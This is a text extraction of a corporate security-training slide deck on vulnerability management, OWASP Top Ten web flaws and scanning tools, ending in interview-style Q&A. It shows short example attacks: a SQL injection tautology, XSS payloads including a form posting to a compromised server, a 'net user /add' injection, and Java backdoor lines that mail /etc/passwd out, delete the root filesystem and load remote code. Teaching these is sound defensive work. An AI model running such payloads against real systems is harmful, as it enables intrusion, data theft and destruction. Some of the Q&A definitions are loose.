Security Vulnerability Management

7/30/2019 Security Vulnerability Management

http://slidepdf.com/reader/full/security-vulnerability-management 1/50

1

CONFIDENTIAL© Copyright 2008 Wipro Ltd 1

Vulnerability Management

[email protected] – COE, Wipro Technologies


Proactive Security

Whoever is first in the field and awaits the coming of the

enemy, will be fresh for the fight; whoever is second in thefield and has to hasten to battle will arrive exhausted.

-- Sun-Tzu “The Art of War”



2


Why is Security Testing Important?

“A few lines of code can wreak

more havoc than a bomb.”


In computer security, the word vulnerability refers to a weakness in asystem allowing an attacker to violate the confidentiality, integrity,availability ,access control, consistency or audit mechanisms of thesystem or the data and applications it hosts. Vulnerabilities mayresult from bugs or design flaws in the system.

Vulnerability

Vulnerability is a hole or a weakness in the system, which can be adesign flaw, an implementation bug etc. that allows an attacker tocause harm to the stakeholders of the system. Stakeholders includethe application owner, administrators, users, and other entities thatrely on the system.

There are two sources of vulnerabilities§Weaknesses in the information technology (IT) products as

supplied by the vendor(s)

§Weaknesses in the ways organizations manage and use the

technology

What is Vulnerability ?



3


IT Product Vulnerabilities

§ The number of vulnerabilities in IT products discovered each year isincreasing dramatically. According to CERT, 140 vulnerabilities werereported in 1995 and 4,129 vulnerabilities were reported in 2002.Vulnerability represents a weakness in a product that can be exploited insome way to help an attacker achieve the objective of compromising asystem.

There are two types of IT product vulnerabilities

§ Vulnerabilities resulting due to system architecture. For e.g. OperatingSystem architecture - Difficult to correct

§ Vulnerabilities resulting due to low level design or implementationerrors. For e.g. bugs in programs - Easier to correct

§ In either case, IT product vulnerabilities are often long-lived with manyInternet connected systems vulnerable to a particular form of attackmany months after vendors produce corrections to the vulnerability thatwas exploited by the attack.


Weaknesses in Management and Operational Practice

Weaknesses in Management and Operational Practice§ The major source of vulnerability includes weaknesses in the management

and operational practices of system operators.

Factors that lead to weaknesses in operational practices include things like:

§ Lack of, ambiguous or poorly enforced organizational security policies andregulations; security roles and responsibilities that are not clearly defined orlack of accountability

§ Failure to account for security when outsourcing IT services§ Lack of security awareness training for all levels of staff

§ Poor account management or password management by all users§ Poor physical security leading to open access to important computers and

network devices§ Weak configuration management practices that allow for vulnerable

configurations Weak authentication practices that allow attackers tomasquerade as valid system users

§ Lack of vulnerability management practices that require system administratorsto quickly correct important vulnerabilities

§ Failure to use strong encryption when transmitting sensitive information overthe network.

§ Lack of monitoring and auditing practices that can detect attacker behaviorbefore damage is done



4


Weaknesses

§ Weaknesses in any of these areas open the doors for attackersand give them opportunities to take advantage of theweaknesses to achieve their goals.

§ Managing the risk associated with this category of vulnerabilityrequires that organizations dedicate resources to the riskmanagement task.

§ Operations must be continuously assessed and correctiveactions taken when needed.


Vulnerability Classifications, Categorizations andSeverity Levels

Vulnerability Classifications, Categorizations and Severity Levels

Vulnerability Classification

§ Active Vulnerability: An active vulnerability is the one which wasidentified in the previous assessment(s) as well as in the currentvulnerability assessment

§ New Vulnerability: A new vulnerability is the one which is recentlyidentified in current vulnerability assessment and was not present inprevious assessment(s) results

§ Re-opened Vulnerability: A re-opened vulnerability is the one whichwas identified in the earlier vulnerability assessment(s), then fixedand again identified in current assessment

§ Fixed Vulnerability: A fixed vulnerability is the one which wasidentified in previous vulnerability assessment(s) and fixed beforecurrent assessment and therefore identified as fixed/ (non-existing)vulnerability in current assessment.



5


Vulnerability Classifications, Categorizations andSeverity Levels

Confirmed Vulnerability

§ A vulnerability whose existence is confirmed is called as aconfirmed vulnerability. Vulnerabilities can exist in severalareas of network, such as in firewalls, FTP servers, Webservers, operating systems or CGI bins.

Potential Vulnerability

§ The vulnerability whose existence could not be confirmed iscalled as a potential vulnerability. The only way to verify theexistence of such vulnerabilities on network would be toperform an intrusive scan, which could result in a denial of

service. This is again a call to be taken by the vulnerabilityassessment team.


3 security levels

The confirmed and potential vulnerabilities can be further classified into3 security levels based on their impact on the systems

§ Low: Intruders can collect information about the host like OSinstalled, open ports, services etc.

§ Medium: Intruders can collect sensitive information from the host,including security settings. This could result in potential misuse of the host by intruders. For example, vulnerabilities at this level mayinclude partial disclosure of file contents, access to certain files onthe host, directory browsing, disclosure of filtering rules and securitymechanisms, denial of service attacks, and unauthorized use of services, such as mail-relaying.

§ High: Intruders can gain control of the host, which can lead to the

compromise of entire network security. For example, vulnerabilities atthis level may include full read and write access to files, remoteexecution of commands, and the presence of backdoors.



6


Vulnerability Management

Vulnerability ManagementTo overcome the growing risk posed by vulnerabilities, an organization must develop aformal vulnerability management program addressing the entire life cycle of vulnerabilitymanagement as shown in FIG A. All of these must be supported by an underlyingfoundation of people, process and technology initiatives.

Asset Management Vulnerability Assessment

Report

Information

Asset

update

Asset

profile

Report

information

Prioritized asset list

Prioritization of assets

Remediation

Monitoring

Reporting

Report

information

Vulnerabilities list

Detailed report on

vulnerability

management

FIG A – Vulnerability Management Lifecycle


Asset Management

Asset Management

§ To get a confident start to a VM process it is very important to have anaccurate inventory and profile of what the infrastructure contains. Foran organization of any significant size, this inventory will be complexand constantly changing as new components are added and existingcomponents are retired. The below mentioned steps aid in making acomprehensive asset inventory

§ Identification of assets can be done either manually, or by using anautomated tool like an asset management software

§ Discovered assets must be reviewed to determine business criticalityand risk tolerance

§ All technologies or software running on these assets must be identified

at a specific version level§ All patches and system configurations applied to these technologies

must be identified on an asset-by-asset basis

§ The individuals accountable for the assets must be identified



7


Vulnerability Assessment

Vulnerability Assessment

§ Once the identification of the network assets is done, a vulnerabilityassessment should be carried out to find the vulnerabilities existing inthe network. Many software tools exist that can aid in the discovery (andsometimes removal) of vulnerabilities in a computer system.

§ Examples of vulnerability scanner tools

§ Retina Network Security Scanner

§ QualysGuard

§ GFI LANguard Network Security Scanner

§ Nessus Vulnerability Scanner

§ Though these tools can provide a good overview of possiblevulnerabilities present, they can not replace human judgment. Relyingsolely on scanners will yield false positives and a limited-scope view of

the problems present in the system. Therefore, a proper vulnerabilityassessment system should make use of vulnerability scanner tools toidentify potential vulnerabilities and then carry out a detailedvulnerability analysis to remove false positives. Finally a report should begenerated that lists all the vulnerabilities found in the vulnerabilityassessment process.


Prioritization of Assets

Prioritization of Assets

§ After identification of vulnerabilities in the assets, the next step is torate each asset. The owners of the assets have to rate their assetsbased on how critical each asset, or the information contained on thatasset, is to the business, and the severity levels of the vulnerabilitiesfound in the asset that may compromise the system.

§ The highest priority assets should be scanned regularly forvulnerabilities.

§ The prioritization process enables businesses to notify asset ownerswhen vulnerabilities are discovered and to rank the severity of thoseexposures. Also it helps businesses to understand and define anacceptable level of risk and how each risk affects the technology and

business activities of the company.§ This model can then be communicated to staff in business, technical

and behavioral terms, so that all employees understand what will beexpected of them when vulnerabilities are fixed.



8


Remediation

Remediation§ Remediation is the most important step in VM process. Hence care should be

taken to prevent any unwanted changes taking place because of theremediation process.

§ Steps for the remediation process§ A risk threshold should be defined and all the vulnerabilities with risk level

below the threshold should be accepted

§ For risk levels above the threshold value a specific remediation plan must bedefined for each asset or asset group.

§ Testing of the remediation prior to implementation is required§ Specific vulnerability remedies must be deployed§ Documentation that a vulnerability remedy has been applied to an asset must

be performed for audit purposes

Monitoring§ Detecting and fixing vulnerabilities do not offer a complete solution.

Organizations need to continuously monitor and track the latest vulnerabilitiesand their corresponding fixes.

§ Ongoing verification of vulnerability remedies, identification of currenttechnology, and patch and configuration inventories for each asset must beperformed

§ The progress of the vulnerability management process must be measured toverify and monitor that an organization’s risk exposure is manage


Vulnerability Management Products

Vulnerability Management Products

§ There are many players in the market who offer vulnerabilityManagement products. But one should carefully evaluate thoseproducts on the parameters mentioned in the vulnerabilitymanagement lifecycle before zeroing on to a specific product.Some of the well-known vulnerability management productsare:

§ McAfee Foundstone on Demand Service

§ CA eTrust Vulnerability Manager

§ NetIQ Vulnerability Manager

§ Symantec Vulnerability Assessment

§ Symantec Enterprise Security



9


Why Find Vulnerabilities?

§ Nobody believes their software is vulnerableŸ “If the software works, then it must be secure”

§ Finding flaws starts you on the path

FindFlaws Fix Find

Flaws Improve FindFlaws Improve

If you’re not finding them, you’re allowing them


Software Is A Black Box

§ Complex

ŸMillions of lines of code

Ÿ Layers of leaky abstractions

ŸMassively interconnected

§ Compiled

ŸDifficult to reverse engineer

ŸDifferent on every platform

§ Legal Protections

ŸNo peeking

ŸWe’re not liable



10


Key Vulnerabilities

§ A few serious common vulnerabilities…

Ÿ Broken Access Control

Ÿ Weak Authentication and Session Management

Ÿ SQL Injection

Ÿ Cross Site Scripting

§ For more information see…

Ÿ The Top Ten Most Critical Web Application Vulnerabilities(www.owasp.org/documentation/topten.html )

ŸA Guide to Building Secure Web Applications and WebServices (www.owasp.org/documentation/guide.html )


SQL Injection Illustrated

F i r e w a l l

Hardened OS

Web Server

App Server

F i r e w a l l

D a t a b a s e s

L e g a c y S y s t e m s

W e b S e r v i c e s

D i r e c t o r i e s

H u m a n R e s r c s

B i l l i n g

Custom Code

APPLICATIONATTACK

N e t w o r k

L a y e r

A p p l i c a t i o n L a y e r

A c c o u n t s

F i n a n c e

A d m i n i s t r a t i o n

T r a n s a c t i o n s

C o m m u n i c a t i o n

K n o w l e d g e M g m t

E - C o m m e r c e

B u s .

F u n c t i o n s

HTTPrequest

M

SQLquery

M

DBTable

>

HTTPresponse

>

“SELECT * FROM users WHERE user=‘’ OR

1=1--’ AND pass=‘password’”

1. Application presents a loginform to the attacker

2. Attacker sends an attack in theform data

3. Application forwards attack tothe database in a SQL query

Successful Login“Welcome, Alice”

4. Database runs query containing

attack and sends results toapplication

5. Application thinks login workedand sends welcome page



11


Scanning for SQL Injection

§ Method

Ÿ Use “signatures” to send malformed SQL commands

Ÿ Analyze responses to see if it “worked”

Ÿ Nessus, nikto

§ Pros

Ÿ Requires only network access to application

Ÿ Fast and easy to run

§ Cons

Ÿ May only exercise part of an application

Ÿ Prone to false alarms and missed positives

Ÿ Results indicate URL but not line of code

Ÿ Can be problems with credentials, roles, and SSL


Static Analysis for SQL Injection

§ Method

Ÿ Automatically analyze source code for patterns

Ÿ Tools load source code, compile, and analyze

§ Pros

Ÿ Requires only the software baseline

Ÿ Fast and easy to run

§ Cons

Ÿ Can’t factor in the runtime environment

Ÿ Prone to false alarms and missed positives

Ÿ Results indicate line of code but not URL

Ÿ Doesn’t find design problems



12


Penetration Testing for SQL Injection

§ Method

Ÿ Custom attacks by an expert security tester

Ÿ Use OWASP WebScarab to craft custom attacks

Ÿ Expert analyzes responses to see if attack worked

§ Pros

Ÿ Open source tools available

Ÿ Recommend an internal team

§ Cons

Ÿ Requires expertise in security, software, and SQL

Ÿ Difficult to exercise the entire application

Ÿ Tester may not be able to determine success


Code Review for SQL Injection

§ Method

Ÿ Reviewer analyzes code for patterns

Ÿ Use tools to view baseline in different ways

Ÿ Examine mechanisms, common vulnerability areas

§ Pros

Ÿ Cost-effective

Ÿ Can examine the entire baseline

§ Cons

Ÿ Can’t factor in the runtime environment

Ÿ Requires skills in software and security



13


A Change In Perspective

§ Think like an attacker!

Ÿ Understand how the application works

Ÿ Especially the security mechanisms

Ÿ How does the application make security decisions

§ The easy part?

Ÿ Test and analyze for a single vulnerability

§ The hard part?

Ÿ Do an entire application for all types of vulnerabilities


Getting Started

§ Adopt the OWASP Top Ten

Ÿ Set the bar

§ Spot check a few applications

Ÿ Are your security mechanisms easy to understand?

Ÿ Are you doing validation, error handling, logging, etc?

§ Get security out in the open!

§ Come to my talk later to find out more!!!



14


OWASP Can Help

§ Open Web Application Security Project

Ÿ Nonprofit Foundation

Ÿ All materials available under approved open source licenses

Ÿ Dozens of projects, over 50 chapters worldwide, thousandsof participants, and millions of hits a month

OWASP is dedicated to finding and fighting thecauses of insecure software


OWASP Supports Vulnerability Analysis

§ OWASP Top Ten

Ÿ Set priorities, get management buy-in

§ OWASP Guide

Ÿ 300 page book for application security

§ OWASP Testing Guide

Ÿ Test/analysis methods for application security

§ OWASP WebScarab

Ÿ Web application & web service penetration tool



15


OWASP Top Ten Most Critical Web Application SecurityVulnerabilities

§ A1. Unvalidated Input

§ A2. Broken Access Controls

§ A3. Broken Authentication and Session Management

§ A4. Cross Site Scripting Flaws

§ A5. Buffer Overflows

§ A6. Injection Flaws

§ A7. Improper Error Handling

§ A8. Insecure Storage

§ A9. Denial of Service

§ A10. Insecure Configuration Management


A1. Unvalidated Input

§ Definition: Information from web requests is not validatedbefore being used by a web application. Attackers can usethese flaws to attack backend components through a webapplication.

§ Test: insert all possible values for parameters: GET, POST,hidden fields, cookies, HTTP Headers,...

§ Automated tools: do this very good, but lack classification of the errors returned



16


A1. Unvalidated Input

§ How to detect: examine result (and NOT error codes) andidentify vulnerabilities

Ÿ SQL Injection: parse for SQL error codes :S

Ÿ No exception handling: parse for stacktraces?

Ÿ Authorization bypass: is that a Admin-button?

Ÿ Buffer overflow (Denial-of-Service?): empty HTML-page?

Ÿ LDAP Injection: different user attributes?

Ÿ ...

§ Ultimate test: exploit vulnerability MANUALLY -> THISREQUIRES THE TESTER TO KNOW THE ATTACK PAYLOAD

§What about non-English web applications?


Unvalidated Input

§ “SQL Injection”

Ÿ an attacker provides malformed data

Ÿ application uses that data to build a SQL statement usingstring concatenation

§ “Command Injection”

Ÿ un-trusted data placed into data

Ÿ passed to some sort of compiler or interpreter, where thedata might, if it’s formatted in a particular way, be treatedas something other than data.

§ “Cross-Site Scripting”



17


A2. Broken Access Controls

§ Definition: Restrictions on what authenticated users areallowed to do are not properly enforced. Attackers can exploitthese flaws to access other users' accounts, view sensitivefiles, or use unauthorized functions.

§ Test: login with valid accounts with different privileges andattempt to access protected parts like URLs, Struts actions,hidden fields,...

§ Automated tools: can guess known URIs like /admin but dothis within the existing user context or as an anonymous user

§ What I want: expected output should be an authorization

matrix: user A can access URI A, user B cannot access URI B, ...like a sitemap but with authorization levels


Broken Access Control

§ “Improper File Access”

Ÿ There are three common security issues.

wrace conditions occur when a file has been checked forsecurity but then something adverse could happen tothe file before actual use

útime of check; time of use (TOCTOU).

wCode opens a file expecting the file to contain normalfile contents but instead it is a link to another file or adevice name

wWhen attackers have control over a file that theyshouldn’t have, allowing them to read and potentiallyoverwrite sensitive information



18


A3. Broken Authentication and Session Management

§ Definition: Account credentials and session tokens are notproperly protected. Attackers that can compromise passwords,keys, session cookies, or other tokens can defeatauthentication restrictions and assume other users' identities.

§ Test: analyse the authentication mechanism: is HTTPS used,secure cookie, random session-ID,...

§ Automated tools: do this out-of-the-box


Broken Authentication and Session Management

§ “Use of Magic URLs and Hidden Form Fields”

wMagic URLs

úURLs that contain sensitive information orinformation that could lead an attacker to sensitiveinformation

wHidden form field

úMalicious users could view the form contents,hidden or not,

úBy using the View Source option in their browsers,and then create malicious versions to send to theserver



19


A4. Cross Site Scripting Flaws

§ Definition: The web application can be used as a mechanism totransport an attack to an end user's browser. A successfulattack can disclose the end user’s session token, attack thelocal machine or spoof content to fool the user.

§ Test: use RSnake’s cheat sheet for XSS filter evasion(http://ha.ckers.org/xss.html)

§ Automated tools: some tools inject a limited XSS pattern andfor some tool you don’t know what they inject and you CAN’Tchange it. But if you have a web site with 1000 forms they arevery useful to automate the injection. But ... If you find 1 XSS,you probably find more J


Cross Site Scripting

§ “Cross-Site Scripting”

Ÿ a web application takes input from a user but fails tovalidate the input

Ÿ the input is echoed directly in a web page.

Ÿ input could be malicious JavaScript, when echoed andinterpreted in the destination browser any number of issues could result



20


Cross-Site Scripting

§ What is it?: The Web Application is used to store, transport, anddeliver malicious active content to an unsuspecting user.

§ Root Cause: Failure to proactively reject or scrub maliciouscharacters from input vectors.

§ Impact: Persistent XSS is stored and executed at a later time, by auser. Allows cookie theft, credential theft, data confidentiality,integrity, and availability risks. Browser Hijacking andUnauthorized Access to Web Application is possible using existingexploits.

§ Solution: A global as well as Form and Field specific policy for

handling untrusted content. Use white lists and regularexpressions to ensure input data conforms to the requiredcharacter set, size, and syntax.


Unvalidated Input (A1) with XSS (A4)



21







22



UnvalidatedInput a nd resulted in a Cross-Site Scripting Attack and the theft of the Administrator’s Cookie


Cross-Site Scripting: Content Spoofing

§ Insert un-trusted content into the web application thatcan be used to trick users.

§ Compromise of the integrity of application code viamalicious script code injected into the database

§ Limited only by the attackers imagination.



23


Cross-Site Scripting Exploit

§ <SCRIPT>var oWH = window.open("","","width=275,height=175, top=200, left=250 location=no, menubar=no,status=no, toolbar=no, scrollbars=no,resizable=no");oWH.document.write(“

§ HTML FORM with POST request to http://compromised-server/h4xor.php

§ );</SCRIPT>


Buffer Overflow

§ “Buffer Overruns”

Ÿ if the application writes beyond the bounds of an arrayallocated on the stack, the attacker gets to specify controlinformation

§ “Format String Problems”

Ÿ data from un-trusted users as the format string. As aresult, attackers can write strings in the data processinglanguage to cause many problems

§ “Integer Overflows”

Ÿ errors range from crashes and logic errors to escalation of privilege and execution of arbitrary code

Ÿ the result isn’t what you’d get with pencil and paper



24


A6. Injection Flaws

§ Definition: Web applications pass parameters when they accessexternal systems or the local operating system. If an attackercan embed malicious commands in these parameters, theexternal system may execute those commands on behalf of the web application.

§ Test: replace every parameter with command injection stringswhich depend on the operating system in use

§ Automated tools: some tools inject command injectionpatterns but with some tools you don’t know what they injectand it is impossible to change them. But if you have a web sitewith 1000 forms they are very useful to automate the injection

§ Results: output of the command injection must be obtained,how to automate this? E.g. Net user /add Erwin


Injection Flaws

§ Web applications pass parameters when they access externalsystems or the local operating system.

§ If an attacker can embed malicious commands in theseparameters, the external system may execute those commandson behalf of the web application.

Ÿ “SQL Injection”

Ÿ “Command Injection”



25


Example: SQL Tautology Injection

Submitting SQL Query logic instead of a valid date canexpose confidential records.

.


Example: SQL Tautology Injection

Submitting SQL Query logic instead of a valid date canexpose confidential records.

.



26


A7. Improper Error Handling

§ Definition: Error conditions that occur during normal operationare not handled properly. If an attacker can cause errors tooccur that the web application does not handle, they can gaindetailed system information, deny service, cause securitymechanisms to fail, or crash the server.

§ Test: corrupt parameters and look for propagating exceptions

§ Automated tools: by default

§ Result: how to classify an uncaught exception, this depends onthe exception


Improper Error Handling

§ “Failing to Handle Errors”

Ÿ Yielding too much information

Ÿ Ignoring errors

Ÿ Misinterpreting errors

Ÿ Using useless error values

Ÿ Handling the wrong exceptions

wNot capturing the correct error

Ÿ Handling all exceptions

whide errors by simply pretending the exception neverhappened



27


A8. Insecure Storage

§ Definition: Web applications frequently use cryptographicfunctions to protect information and credentials. Thesefunctions and the code to integrate them have proven difficultto code properly, frequently resulting in weak protection.

§ Test: attempt to access configuration files via forcefulbrowsing like web.xml, examine cookies and parameters,dump passwords from database via SQL Injection

§ Automated tools: are unable to exploit vulnerabilities in orderto find passwords

§ “Failing to Store and Protect Data Securely”

Ÿ permissions required to access the data

Ÿ data encryption issues

Ÿ threats to stored secrets.


A9. Denial of Service

§ Definition: Attackers can consume web application resourcesto a point where other legitimate users can no longer access oruse the application. Attackers can also lock users out of theiraccounts or even cause the entire application to fail.

§ Test: attempt to brute-force accounts, performance test,…

§ Automated tools: have no problem to attack accounts and theydon’t execute performance tests but when attacking a site withfull force it can have some unexpected side-effects

§ “DoS”Ÿ consume web application resources to a point where other

legitimate users can no longer access or use the application

Ÿ Attackers can also lock users out of their accounts or even causethe entire application to fail.

Ÿ Many DoS attacks are mitigated through infrastructure, such asfirewalls and use of quotas.



28


A10. Insecure Configuration Management

§ Definition: Having a strong server configuration standard iscritical to a secure web application. These servers have manyconfiguration options that affect security and are not secureout of the box.

§ Test: use Google to retrieve vulnerabilities about SUT and tryto exploit them

§ Automated tools: can test automatically for thesevulnerabilities and when they have a built-in update functionthese are very useful

§ “Web and Application Server Security”

Ÿ strong server configuration standard is criticalŸ many configuration options affect security


Warnings….

§ Using the techniques learned from the OWASP toolscould lead to job termination, financial liability,and/or criminal penalties.

Ÿ Hacking is illegal

Ÿ Hacking may be considered terrorism



29


§ In order to find vulnerabilities in web applications we need toidentify them:

Ÿ Via code audit: a lot of work

Ÿ Via testing: manual or automated

§ Manual testing: a human being attacks a web application usinghis experience, knowledge and tools (open-source, self-made,IE J)

§ Automated testing: a human being uses an automatedvulnerability scanner to attack a web application

Can (Automated) Testing Tools Really Find the OWASPTop 10?


Testing

§ There is no standard to test web applications

Ÿ How to test for vulnerabilities

Ÿ Different type of payloads that must be used e.g.<script>alert(document.cookie)</script vs <bodyonload=alert(document.cookie)>

Ÿ What should be the result of a test: how to detect a pop-upwindow in an HTML stream?

Ÿ What should not be the result of a test: will a script tagembedded in another script tag really get executed?



30


Testing

§ OWASP Testing Guide is a framework and a guideline, not atechnical step-by-step guide

§ OSSTMM - Open Source Security Testing Methodology Manual:more detailed but not on an web app level more on anetwork/OS level

§ No education or recognized certifications for security testing


Testing

§ People have different backgrounds:

Ÿ Network security: how experienced are they in XMLparsing, AJAX, SQL,…

Ÿ Functional testers: how do they know what a securityvulnerability is? How can they exploit a vulnerability?

Ÿ Developers: hate to test or audit code

Ÿ Application security expert: has the experience and theknowledge of the three groups above but are a rare species

§ Conclusion:

Ÿ Everyone has a different approach to testing

Ÿ Automated tools also have a different approach



31


Automated Tools – Open-source

§ For free

§ Run on multi-platforms, thank you Java

§ No or very limited reporting

§ Usage-mode: expert security tester

§ Examples: Oedipus, Paros, Burp Intruder, WebScarab Fuzzer,Spike, E-Or, …


Automated Tools - Commercial

§ Not cheap: license is application, server or network based

§ Very good reporting capabilities

§ Run only on Windows

§ Usage-mode: typical Next – Next clicking usage but expert inapplication security and the tool is required for optimal results

§ Examples: Cenzic HailStorm, SPIDynamics WebInspect,Sanctum AppScan, Acunetix, NTOspider, …



32


Some questions

§ Is the Top 10 about vulnerabilities, attacks or bad codingpractices?

§ How to differentiate the different classifications?

Ÿ Invalidated input (A1) is a vulnerability, XSS (A4) is anattack against this vulnerability

Ÿ Same for A5, A6 and A7

§ How to define a test plan for the OWASP Top 10?

§ What are the payloads to discover the Top 10? Eg. 10000000 Xor 10000000 A for buffer overflow?


§ Automated Tools are not the silver-bullet to test for the OWASPTop 10

§ They can help a security tester to assess a web application faster

§ Security tester must master the tools and know the limitations

§ Combine open-source tools with commercial tools

§ But automated tools will have difficulties with the latesttechnologies:

Ÿ AJAX: asynchronous XML requests

Ÿ One-time tokens like in Struts, SAP BSP, …

Ÿ Thick clients e.g. Java Web Start

Ÿ Web services

Automated Tools



33


Outline

§ Penetration testing

§ VulnerabilitiesŸ Operating System

Ÿ Web applications

§ Specific toolsŸ Campus provided

Ÿ Soon to be available


2007 UC Davis IT Security Symposium

Security Process AreasFrom INFOSEC Assurance Training & Rating Program

1. Provide Training

2. Coordinate with Customer Organization

3. Specify Initial INFOSEC Needs

4. Assess Threat

5. Assess Vulnerability

6. Assess Impact

7. Assess INFOSEC Risk

8. Provide Analysis and Results

9. Manage INFOSEC Assurance Processes



34


Penetration Testing Process(c/o CoreImpact)


Why?

§ To discover vulnerabilities before they do!

§ To meet policy & regulatory standards

§ To gather metrics to justify time and budgets



35


Regulations

§ Campus CyberSafety

§ SB-1386

§ FERPA

§ HIPAA

Ÿ ePHI (electronic Protected Health Information

§ Payment Card Industry (PCI)

Ÿ Data Security Standard

§ Gramm-Leach-Bliley Act (GLBA)

§ Sarbanes-Oxley Act (SOX)


Vulnerabilities cataloged by CERT

Vulnerabilities identified and cataloged from C

0

1000

2000

3000

4000

5000

6000

7000

8000

9000

1 9 9 5

1 9

9 6

1 9 9 7

1 9

9 8

1 9 9 9

2 0

0 0

2 0

0 1

2 0 0 2

2 0

0 3

2 0 0 4

2 0 0 5

2 0 0 6

1 Q , 2 0 0 7

Year

Vulnerabilities



36


SANS Top-20Internet Security Attack Targets

Operating Systems

W1. Internet Explorer

W2. Windows Libraries

W3. Microsoft Office

W4. Windows Services

W5. Windows ConfigurationWeaknesses

M1. Mac OS X

U1. UNIX Configuration Weaknesses

Cross-Platform Applications

C1 Web Applications

C2. Database Software

C3. P2P File Sharing Applications

C4 Instant Messaging

C5. Media PlayersC6. DNS Servers

C7. Backup Software

C8. Security, Enterprise, andDirectory Management Servers

Network Devices

N1. VoIP Servers and Phones

N2. Network and Other DevicesCommon Configuration Weaknesses

Security Policy and Personnel

H1. Excessive User Rights and

Unauthorized Devices

H2. Users (Phishing/Spear Phishing)

Special Section

Z1. Zero Day Attacks andPrevention Strategies


Fyodor’sTop 10 Vulnerability Scanners

§ Nessus

§ GFI LANguard

§ Retina

§ Core Impact

§ ISS Internet Scanner

§ X-scan

§ Sara

§ QualysGuard

§ SAINT

§ MBSA



37


UC Davis Vulnerability Scanning Tools

§ SelfScan

§ DistAuth

§ Campus Scanning

§ Audit

Ÿ Nessus for sysadmins

§ http://security.ucdavis.edu/vuln_resources.cfm


2007 UC Davis IT Security Symposium

Nessus in depth

§ From http://www.tenablesecurity.com/

§ Client - server architecture

§ Language

§ Plugins

Ÿ Language

Ÿ Credentialed

Ÿ “Safe”



38


Nessus in depth

§ What does this plugin mean to me?

Ÿ http://www.nessus.org/plugins/index.php?view=search

Ÿ “There are 14944 plugins in the direct feed (1133 in thenon-registered GPL feed and 14894 in the registered feed),covering 6902 unique CVE ids and 5603 unique BugtraqIDs”


Web Application Security

§ http://security.ucdavis.edu/webapp.cfm

§ WebInspect by SPI Dynamics

§ AppScan by Watchfire (IBM)

§ Open Source

Ÿ Nikto

Ÿ Paros proxy

Ÿ WebScarab



39


WebInspect


Security Analysis Techniques

Find Vulnerabilities Usingthe Running Application

Find Vulnerabilities Usingthe Source Code

AutomatedAutomatedVulnerabilityVulnerabilityScanningScanning

AutomatedAutomatedStatic CodeStatic Code

AnalysisAnalysis

ManualManualPenetrationPenetrationTestingTesting

ManualManualCodeCode

ReviewReview

Combining All Four Techniques is Most Effective



40


Vulnerability Patterns

public class DamagedStrutsForm extends ActionForm {

public void doForm( HttpServletRequest request) {

UserBean u = session.getUserBean();

u.setName(request.getParameter("name"));

u.setFavoriteColor(request.getParameter("color"));

}

public boolean validate( HttpServletRequest request) {

try {

if ( request.getParameter("Name").indexOf("<scri") != -1 ) {logger.log("Script detected" );

return false;

}

}

catch( Exception e ) {}

return true;

}

}

Failure to Validate

Blacklist Validation

Fail Open

Failure to Validate

Time of Check, Time of Use

Failure to Validate


What Could a Malicious Developer Do?

§ Trojan Horse runs for adminif ( System.getCurrentUser().getName().equals( “admin” ) )

Runtime.exec( “sendmail [email protected] < /etc/passwd”);

§ Secret trigger removes all files on root partitionif( req.getParameter( “codeword” ).equals( “eagle” ) )

Runtime.exec( “rm –rf /” );

§ Randomly corrupt data one time in 100if ( Math.random() < .01 ) bean.setValue( “corrupt” );

§ Load and execute code from remote server((A)(ClassLoader.getSystemClassLoader().defineClass(null,readBytesFromNetwork(),0,422).newInstance())).attack();

§ Make backdoor look like inadvertent mistakeif ( input < 0 ) throw new RuntimeException( “Input error” );

Impossible to tell malicious from mistakeWho wrote the libraries your application uses?



41


Questionnaire

Vulnerability AssessmentAndPenetration Testing


Questions And Answers

1) How do you differentiate Vulnerability Scanning, Vulnerability Assessmentwith Penetration Testing and why do we do it?

Vulnerability Scanning: The security operation performed on the computerdevices to find the vulnerabilities which can make the machines insecure.

Vulnerability Assessment: The process of identifying and quantifyingvulnerabilities in a computer system which involves several phases.1) Target Selection2) Vulnerability Scanning and Port Scanning3) Vulnerability Assessment and Penetration Testing4) Risk Assessment5) Problem Management6) Vulnerability Review7) Vulnerability Remediation

Penetration Testing: method of evaluating the security of a computer systemor network by simulating an attack by a malicious hacker. The processinvolves an active analysis of the system for any weaknesses, technicalflaws or vulnerabilities. This analysis is carried out from the position of a

potential attacker, and can involve active exploitation of vulnerabilities.



42


Q

2) How do you define a Risk Assessment?Assessment of Vulnerabilities by running the exploits and verifications tocheck whether a particular vulnerability really affects the system or aFalse Positive.

3) How do you differentiate a Risk, Threat and Vulnerability?

Risk: The problem you face by a malicious activity performed on yourcomputer system.

Threat: The entity which is responsible to cause you the risk or problem.

Vulnerability: A loop hole that exists on your computer system which canallow a threat to exploit your computer system.

4) What is the difference between Hacking, Cracking and Ethical Hacking?

Hacking: Retrieving the confidential information of the network/computer

systems, credentials of a user, etc.Cracking: Defeating the security devices in a computer network.

Ethical Hacking: method used to defend hacking or Process of mitigatingthe security risks. Ex. Vulnerability Assessment


5) What is a Security Compliance Policy and why should an Organizationfollow it? Name few security compliance standards.

A Security compliance policy is a set of rules on Information TechnologySecurity Standards that are supposed to be in place in a network or in acomputer system. An Organization should follow these security policiesfor the following reasons.

• To Protect company assets (Hardware as well as confidential Information)

• To gain a competitive advantage

• To comply with regulatory requirements and fiduciary responsibilities

Few Security Compliance Policies are Hippa

6) What is Hacktivism?

hacktivism is the act of hacking into a website or computer system in orderto communicate a politically or socially motivated message. Unlike amalicious hacker, who may disrupt a system for financial gain or out of adesire to cause harm, the hacktivist performs the same kinds of disruptive actions (such as a DoS attack) in order to draw attention to acause. For the hacktivist, it is an Internet-enabled way to practice civildisobedience and protest.

Q



43


Q 7) How do you differentiate a Black box, White Box and Grey Box Testing?

Black box Testing: Method of assessing/testing the Target devices wherein you are not aware any information of the devices you test. Part of the this test includes social engineering.

White Box Testing: Analyst has all the information along with theconfiguration details of the Target devices he test. This tests arenormally automated tests done by security tools.

Grey Box Testing: You know few details of the target device throughwhich the analyst needs to find the other device/network informationdetails to test.

8) What is Security Auditing?

A security audit is a manual or systematic measurable technicalassessment of a system or application. Manual assessments includeinterviewing staff, performing security vulnerability scans, reviewing

application and operating system access controls, and analyzingphysical access to the systems. Automated assessments include systemgenerated audit reports or using software to monitor and reportchanges to files and settings on a system. Systems can includepersonal computers, servers, mainframes, network routers, switches.Applications can include Web Services, Microsoft Project Central, OracleDatabase.


Q

9) How frequently is the Vulnerability Assessment done and on whatfactors does the frequency depend?

Vulnerability Assessment for a network infrastructure can be doneweekly, monthly, Quarterly, Semi-Annually and Yearly according to therequirement. Frequency of the scans depends on the device’s exposureto the internet, the volume of the network it handles, the criticality etc.

